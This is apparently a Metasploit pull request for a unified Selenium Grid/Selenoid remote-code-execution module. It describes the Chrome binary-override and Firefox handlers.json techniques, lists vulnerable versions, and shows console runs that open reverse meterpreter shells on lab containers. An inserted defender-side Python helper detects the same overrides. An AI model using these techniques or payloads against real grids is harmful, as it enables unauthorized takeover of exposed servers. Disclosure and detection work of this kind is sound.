Unified Selenium Grid/Selenoid RCE with Firefox + Chrome auto-detection #21003

Open
Chocapikk wants to merge 3 commits into rapid7:master from Chocapikk:selenium-grid-rce

Conversation


@Chocapikk Chocapikk commented Feb 21, 2026

Hello Metasploit Team,

This PR replaces the two existing SeleniumGreed modules (selenium_greed_chrome_rce_cve_2022_28108 and selenium_greed_firefox_rce_cve_2022_28108) with a single unified module that auto-detects available browsers and picks the best attack vector.

Summary

Why a unified module? Both old modules target the same misconfiguration (unauthenticated WebDriver API) with different browser-specific payloads. There's no reason to maintain two separate modules for what is fundamentally the same exploit flow: enumerate browsers, create a session, execute code. The new module queries /status, identifies the backend (Grid vs Selenoid), enumerates available browsers, and auto-selects the best vector.

The CSRF framing was wrong. The original modules referenced CVE-2022-28108 (CSRF via non-JSON content types), but both modules sent application/json requests directly to the target. No CSRF involved, no victim browser needed. The actual attack is unauthenticated API abuse (CWE-306), which is what this module now correctly references.

The bash/sudo wrapper is gone. The old Firefox module wrapped the payload in a shell script that checked for passwordless sudo and piped through sudo su root -c /bin/bash. This is unreliable (assumes sudo exists and is passwordless) and unnecessary. The module now delivers payload.encoded directly via the data URI handler. Users who land as seluser can privesc themselves - the default Docker images ship with passwordless sudo, but that's post-exploitation, not the module's job. This makes the exploit more reliable across different environments.

Key changes:

  • Merged Chrome + Firefox into selenium_greed_rce.rb with moved_from aliases for both old module paths so existing references keep working
  • BROWSER option (auto/firefox/chrome) - Firefox preferred since it works on all Grid versions (never patched), Chrome binary override as fallback for Grid < 4.11.0 and all Selenoid versions
  • Selenoid support - auto-detects Selenoid backends and adjusts API paths
  • FileDropper for proper cleanup of FETCH payload artifacts
  • FETCH_WRITABLE_DIR defaults to /tmp - the Firefox handler's cwd is / (not writable by seluser), so the FETCH payload needs a writable dir

Firefox profile handler - unpatched since 2021

The Firefox technique injects a custom profile with a handlers.json mapping application/sh to /bin/sh, then navigates to a data:application/sh URI to trigger execution. This was reported in SeleniumHQ/selenium#9526 in May 2021. The Selenium team responded with documentation improvements and optional basic auth. The actual handler injection was never fixed and works on all Grid versions including the latest (4.40.0 at time of writing).

Targets

  1. Python In-Memory (default) - python/meterpreter/reverse_tcp via Chrome binary override
  2. Unix/Linux Command Shell - cmd/linux/http/x64/meterpreter/reverse_tcp via fetch payload (both Chrome and Firefox)

Vulnerable versions

  • Selenium Grid < 4.11.0 with Chrome nodes (binary override, patched via stereotype merge)
  • Selenium Grid - all versions with Firefox nodes (profile handler, never patched)
  • Selenoid - all versions with Chrome or Firefox (project archived December 2024)

Verification

Firefox (auto-detected) - selenium/standalone-firefox:4.40.0 on Ubuntu 24.04

msf6 > use exploit/linux/http/selenium_greed_rce
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4480
LPORT => 4480
msf6 exploit(linux/http/selenium_greed_rce) > set TARGET 1
TARGET => 1
msf6 exploit(linux/http/selenium_greed_rce) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_rce) > set FETCH_SRVPORT 9100
FETCH_SRVPORT => 9100
msf6 exploit(linux/http/selenium_greed_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4480
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenium Grid 4.40.0 with Firefox (all versions vulnerable to profile handler)
[*] Auto-selected Firefox (profile handler - works on all Grid versions)
[*] Creating Firefox session with malicious profile...
[*] Session created: 74d019ac-e7eb-4604-9c48-80baf43da5d9
[*] Navigating to data: URI to trigger handler...
[*] Sending stage (3090404 bytes) to 172.17.0.5
[+] Deleted /tmp/EUeiCPJfsLF
[*] Meterpreter session 1 opened (172.17.0.1:4480 -> 172.17.0.5:37004)

meterpreter > getuid
Server username: seluser
meterpreter > sysinfo
Computer     : 56a95484dc83
OS           : Linux 6.14.0-123037-tuxedo
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Chrome (auto-detected) - selenium/standalone-chrome:4.10.0 on Ubuntu 24.04

msf6 > use exploit/linux/http/selenium_greed_rce
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4481
LPORT => 4481
msf6 exploit(linux/http/selenium_greed_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4481
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenium Grid 4.10.0 with Chrome (vulnerable to binary override)
[*] Auto-selected Chrome (binary override)
[*] Sending Chrome session request with binary override...
[*] Sending stage (23404 bytes) to 172.17.0.7
[*] Meterpreter session 1 opened (172.17.0.1:4481 -> 172.17.0.7:50292)

meterpreter > getuid
Server username: seluser
meterpreter > sysinfo
Computer     : 90f5a4eefae5
OS           : Linux 6.14.0-123037-tuxedo
Architecture : x64
Meterpreter  : python/linux

Selenoid 1.11.3 - selenoid/chrome:128.0 on Ubuntu 24.04

msf6 > use exploit/linux/http/selenium_greed_rce
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/selenium_greed_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/selenium_greed_rce) > set LPORT 4453
LPORT => 4453
msf6 exploit(linux/http/selenium_greed_rce) > run
[*] Started reverse TCP handler on 172.17.0.1:4453
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Selenoid 1.11.3 built at 2024-05-25_12:34:40PM (all versions vulnerable)
[*] Auto-selected Chrome (binary override)
[*] Sending Chrome session request with binary override...
[*] Sending stage (23408 bytes) to 172.17.0.10
[*] Meterpreter session 1 opened (172.17.0.1:4453 -> 172.17.0.10:42984)

meterpreter > getuid
Server username: selenium
meterpreter > sysinfo
Computer     : 669a719f93da
OS           : Linux 6.14.0-123037-tuxedo
Architecture : x64
Meterpreter  : python/linux
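A defender-side triage helper, added here as an example and not part of this PR or the Metasploit module: it inspects Selenium Grid / Selenoid new-session request bodies for the two capability overrides the PR description relies on (a goog:chromeOptions binary override and an injected moz:firefoxOptions profile that carries handlers.json). The JSON shapes, the `constructed_profile` helper and every sample body are constructed assumptions, not captured traffic.

```python
"""Triage of Selenium Grid / Selenoid POST /session bodies: flags a Chrome
'binary' override and an injected Firefox 'profile' (base64 zip, maybe with handlers.json)."""
import base64
import io
import json
import zipfile

def _capability_sets(body):
    # W3C clients use capabilities.alwaysMatch / firstMatch; legacy and Selenoid
    # clients may still send desiredCapabilities at the top level.
    caps = body.get("capabilities", {})
    yield caps.get("alwaysMatch", {})
    yield from caps.get("firstMatch", [])
    yield body.get("desiredCapabilities", {})

def _profile_has_handlers(profile_b64):
    # A Firefox profile travels as a base64 zip; handlers.json is where the
    # MIME-type -> external program mappings described in the PR are stored.
    try:
        zf = zipfile.ZipFile(io.BytesIO(base64.b64decode(profile_b64)))
    except (ValueError, zipfile.BadZipFile):
        return False
    return any(n.rsplit("/", 1)[-1] == "handlers.json" for n in zf.namelist())

def classify_session_request(raw):
    """Findings for one new-session body; an empty list means nothing unusual."""
    try:
        body = json.loads(raw)
    except json.JSONDecodeError:
        return ["unparseable JSON body"]
    findings = []
    for caps in _capability_sets(body):
        chrome = caps.get("goog:chromeOptions", {})
        if "binary" in chrome:
            findings.append(f"chrome binary override -> {chrome['binary']}")
        firefox = caps.get("moz:firefoxOptions", {})
        if "profile" in firefox:
            tag = "with" if _profile_has_handlers(firefox["profile"]) else "without"
            findings.append(f"firefox profile injected ({tag} handlers.json)")
    return findings

def constructed_profile(with_handlers):
    # Minimal base64 profile zip for test input only; not a real Firefox profile.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("prefs.js", 'user_pref("app.update.enabled", false);\n')
        if with_handlers:
            zf.writestr("handlers.json", "{}")  # presence is what the check keys on
    return base64.b64encode(buf.getvalue()).decode()
```

Legitimate test suites also ship profiles and occasionally override the browser binary, so treat the findings as review triggers for a grid that should never see sessions from unknown clients, not as a verdict on their own.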

…etection

Replace separate Chrome and Firefox modules with a single module that
auto-detects available browsers and picks the best attack vector.
Firefox profile handler preferred (unpatched on all Grid versions).
Remove incorrect CSRF framing, sudo wrapper, add FileDropper and
Selenoid support.
@Chocapikk Chocapikk changed the title Add Selenium Grid Chrome binary override RCE module Unified Selenium Grid/Selenoid RCE with Firefox + Chrome auto-detection Feb 21, 2026
@Chocapikk Chocapikk (Contributor, Author) commented:

cc @Takahiro-Yoko - this unifies your Chrome and Firefox modules into a single module with auto-detection. Your original work is credited in the authors list and both old module paths are preserved via moved_from aliases.

@dledda-r7 dledda-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Feb 23, 2026
@msutovsky-r7 msutovsky-r7 self-assigned this Feb 23, 2026